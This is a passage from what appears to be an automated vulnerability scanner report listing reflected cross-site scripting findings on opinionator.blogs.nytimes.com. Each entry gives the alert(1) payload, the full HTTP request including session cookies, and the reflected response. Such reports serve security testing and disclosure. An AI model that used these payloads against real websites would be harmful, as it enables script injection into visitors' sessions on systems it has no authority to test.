<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/timothy-egan6ecde\"><script>alert(1)</script>ad46de21bb2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.239. http://opinionator.blogs.nytimes.com/category/timothy-egan/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/timothy-egan/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ceef4"><script>alert(1)</script>7dd57e8e4f1 was submitted in the REST URL parameter 2. This input was echoed as ceef4\"><script>alert(1)</script>7dd57e8e4f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/timothy-eganceef4"><script>alert(1)</script>7dd57e8e4f1/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:17:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:17:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/timothy-eganceef4\"><script>alert(1)</script>7dd57e8e4f1&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.240. http://opinionator.blogs.nytimes.com/category/timothy-egan/feed/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/timothy-egan/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e964d"><script>alert(1)</script>f79359d6b0 was submitted in the REST URL parameter 3. This input was echoed as e964d\"><script>alert(1)</script>f79359d6b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/timothy-egan/feede964d"><script>alert(1)</script>f79359d6b0/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:14:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:14:22 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/timothy-egan/feede964d\"><script>alert(1)</script>f79359d6b0&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.241. http://opinionator.blogs.nytimes.com/category/timothy-egan/page/2/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/timothy-egan/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ac49"><script>alert(1)</script>1b9e43a9f36 was submitted in the REST URL parameter 3. This input was echoed as 1ac49\"><script>alert(1)</script>1b9e43a9f36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/timothy-egan/page1ac49"><script>alert(1)</script>1b9e43a9f36/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:18:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:18:21 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/timothy-egan/page1ac49\"><script>alert(1)</script>1b9e43a9f36/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.242. http://opinionator.blogs.nytimes.com/category/townie [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/townie

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 653c1"><script>alert(1)</script>00cb55aad01 was submitted in the REST URL parameter 2. This input was echoed as 653c1\"><script>alert(1)</script>00cb55aad01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/townie653c1"><script>alert(1)</script>00cb55aad01 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:30:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:30:30 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/townie653c1\"><script>alert(1)</script>00cb55aad01&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.243. http://opinionator.blogs.nytimes.com/category/townie/page/2/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/townie/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3998c"><script>alert(1)</script>804d504196d was submitted in the REST URL parameter 3. This input was echoed as 3998c\"><script>alert(1)</script>804d504196d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/townie/page3998c"><script>alert(1)</script>804d504196d/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:32:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:32:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/townie/page3998c\"><script>alert(1)</script>804d504196d/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.244. http://opinionator.blogs.nytimes.com/category/townies/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/townies/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7175"><script>alert(1)</script>281342d2c15 was submitted in the REST URL parameter 2. This input was echoed as f7175\"><script>alert(1)</script>281342d2c15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/towniesf7175"><script>alert(1)</script>281342d2c15/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:31:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:31:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/towniesf7175\"><script>alert(1)</script>281342d2c15&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.245. http://opinionator.blogs.nytimes.com/category/townies/feed [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/townies/feed

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3897"><script>alert(1)</script>cd639f55f19 was submitted in the REST URL parameter 3. This input was echoed as b3897\"><script>alert(1)</script>cd639f55f19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/townies/feedb3897"><script>alert(1)</script>cd639f55f19 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:30:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:30:10 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/townies/feedb3897\"><script>alert(1)</script>cd639f55f19&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.246. http://opinionator.blogs.nytimes.com/category/william-d-cohan [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/william-d-cohan

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e940"><script>alert(1)</script>09358cb3c30 was submitted in the REST URL parameter 2. This input was echoed as 7e940\"><script>alert(1)</script>09358cb3c30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/william-d-cohan7e940"><script>alert(1)</script>09358cb3c30 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:17:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:17:31 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/william-d-cohan7e940\"><script>alert(1)</script>09358cb3c30&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.247. http://opinionator.blogs.nytimes.com/category/william-d-cohan/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/william-d-cohan/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 274ad"><script>alert(1)</script>46fc10d5243 was submitted in the REST URL parameter 2. This input was echoed as 274ad\"><script>alert(1)</script>46fc10d5243 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/william-d-cohan274ad"><script>alert(1)</script>46fc10d5243/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:17:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:17:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/william-d-cohan274ad\"><script>alert(1)</script>46fc10d5243&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.248. http://opinionator.blogs.nytimes.com/category/william-d-cohan/feed/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/william-d-cohan/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9efda"><script>alert(1)</script>ebb295baa3a was submitted in the REST URL parameter 3. This input was echoed as 9efda\"><script>alert(1)</script>ebb295baa3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/william-d-cohan/feed9efda"><script>alert(1)</script>ebb295baa3a/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:14:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
